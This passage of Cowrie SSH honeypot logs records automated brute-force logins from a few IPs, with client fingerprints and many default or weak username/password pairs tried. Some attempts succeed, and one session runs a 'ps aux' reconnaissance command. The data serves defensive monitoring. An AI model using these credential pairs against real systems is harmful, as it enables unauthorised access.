nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:52.937093Z","src_ip":"212.227.235.229","session":"5892ec9b589d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:53.654512Z","src_ip":"212.227.235.229","session":"7c023c99c9cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:43:53.655606Z","src_ip":"212.227.235.229","session":"7c023c99c9cf"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:53.823239Z","src_ip":"212.227.125.160","session":"37dbc3e4fecb"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:53.889328Z","src_ip":"212.227.235.229","session":"d80ef083106a"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:53.949000Z","src_ip":"212.227.235.229","session":"05e77924b108"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:55.918921Z","src_ip":"212.227.235.229","session":"05e77924b108"}
{"eventid":"cowrie.login.success","username":"root","password":"Unik","message":"login attempt [root/Unik] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:43:57.629496Z","src_ip":"201.148.180.50","session":"70bf5e24e6b5"}
{"eventid":"cowrie.session.closed","duration":"94.0","message":"Connection lost after 94.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:58.773413Z","src_ip":"212.227.235.229","session":"d80ef083106a"}
{"eventid":"cowrie.login.failed","username":"system","password":"OkwKcECs8qJP2Z","message":"login attempt [system/OkwKcECs8qJP2Z] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:58.969063Z","src_ip":"212.227.235.229","session":"c65817e6df74"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:59.243389Z","src_ip":"212.227.235.229","session":"469b90b4956c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:44:00.779455Z","src_ip":"201.148.180.50","session":"70bf5e24e6b5"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T04:44:00.780142Z","src_ip":"201.148.180.50","session":"70bf5e24e6b5"}
{"eventid":"cowrie.session.closed","duration":"23.8","message":"Connection lost after 23.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:01.163745Z","src_ip":"212.227.235.229","session":"469b90b4956c"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:01.524697Z","src_ip":"212.227.235.229","session":"c65817e6df74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58088,"dst_ip":"1.2.3.4","dst_port":22,"session":"932004100527","protocol":"ssh","message":"New connection: 212.227.235.229:58088 (1.2.3.4:22) [session: 932004100527]","sensor":"my-vps","timestamp":"2025-08-31T04:44:02.240420Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:02.479322Z","src_ip":"201.148.180.50","session":"70bf5e24e6b5"}
{"eventid":"cowrie.session.closed","duration":"12.1","message":"Connection lost after 12.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:02.480423Z","src_ip":"201.148.180.50","session":"70bf5e24e6b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33490,"dst_ip":"1.2.3.4","dst_port":22,"session":"12ad8dd590d9","protocol":"ssh","message":"New connection: 212.227.125.160:33490 (1.2.3.4:22) [session: 12ad8dd590d9]","sensor":"my-vps","timestamp":"2025-08-31T04:44:02.618579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:44:02.619533Z","src_ip":"212.227.125.160","session":"12ad8dd590d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:44:02.808748Z","src_ip":"212.227.125.160","session":"12ad8dd590d9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:44:02.959780Z","src_ip":"212.227.235.229","session":"932004100527"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:44:02.960556Z","src_ip":"212.227.235.229","session":"932004100527"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:03.378938Z","src_ip":"212.227.125.160","session":"12ad8dd590d9"}
{"eventid":"cowrie.login.success","username":"root","password":"@","message":"login attempt [root/@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:44:04.568053Z","src_ip":"212.227.235.229","session":"2b99fd89b67b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:04.569591Z","src_ip":"212.227.125.160","session":"12ad8dd590d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52656,"dst_ip":"1.2.3.4","dst_port":22,"session":"22e0dad0dbbe","protocol":"ssh","message":"New connection: 212.227.235.229:52656 (1.2.3.4:22) [session: 22e0dad0dbbe]","sensor":"my-vps","timestamp":"2025-08-31T04:44:04.825346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:44:05.382230Z","src_ip":"212.227.235.229","session":"22e0dad0dbbe"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:44:05.382919Z","src_ip":"212.227.235.229","session":"22e0dad0dbbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52270,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5848824cd05","protocol":"ssh","message":"New connection: 212.227.125.160:52270 (1.2.3.4:22) [session: a5848824cd05]","sensor":"my-vps","timestamp":"2025-08-31T04:44:07.910395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:44:07.912357Z","src_ip":"212.227.125.160","session":"a5848824cd05"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:44:08.096335Z","src_ip":"212.227.125.160","session":"a5848824cd05"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password","message":"login attempt [postgres/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:08.649598Z","src_ip":"212.227.235.229","session":"932004100527"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:08.650799Z","src_ip":"212.227.125.160","session":"a5848824cd05"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:08.990306Z","src_ip":"212.227.235.229","session":"5892ec9b589d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:09.835541Z","src_ip":"212.227.125.160","session":"a5848824cd05"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:10.216927Z","src_ip":"212.227.235.229","session":"22e0dad0dbbe"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:10.541371Z","src_ip":"212.227.235.229","session":"932004100527"}
{"eventid":"cowrie.session.closed","duration":"20.5","message":"Connection lost after 20.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:10.573882Z","src_ip":"212.227.235.229","session":"5892ec9b589d"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:10.793278Z","src_ip":"212.227.235.229","session":"7c023c99c9cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60030,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1ad2edf0e63","protocol":"ssh","message":"New connection: 212.227.235.229:60030 (1.2.3.4:22) [session: b1ad2edf0e63]","sensor":"my-vps","timestamp":"2025-08-31T04:44:12.100500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:44:12.650062Z","src_ip":"212.227.235.229","session":"b1ad2edf0e63"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:44:12.809705Z","src_ip":"212.227.235.229","session":"b1ad2edf0e63"}
{"eventid":"cowrie.session.closed","duration":"29.5","message":"Connection lost after 29.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:13.718492Z","src_ip":"212.227.235.229","session":"7c023c99c9cf"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:13.993961Z","src_ip":"212.227.235.229","session":"22e0dad0dbbe"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:14.364920Z","src_ip":"212.227.235.229","session":"b1ad2edf0e63"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T04:44:14.882942Z","src_ip":"212.227.235.229","session":"2b04a358f8dd"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:15.626390Z","src_ip":"212.227.235.229","session":"b1ad2edf0e63"}
{"eventid":"cowrie.session.closed","duration":"39.2","message":"Connection lost after 39.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:16.011338Z","src_ip":"212.227.235.229","session":"2b99fd89b67b"}
{"eventid":"cowrie.session.closed","duration":"36.1","message":"Connection lost after 36.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:44:16.213630Z","src_ip":"212.227.235.229","session":"2b04a358f8dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53436,"dst_ip":"1.2.3.4","dst_port":22,"session":"c348bdc7da8c","protocol":"ssh","message":"New connection: 212.227.125.160:53436 (1.2.3.4:22) [session: c348bdc7da8c]","sensor":"my-vps","timestamp":"2025-08-31T04:44:18.718332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:44:18.722337Z","src_ip":"212.227.125.160","session":"c348bdc7da8c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 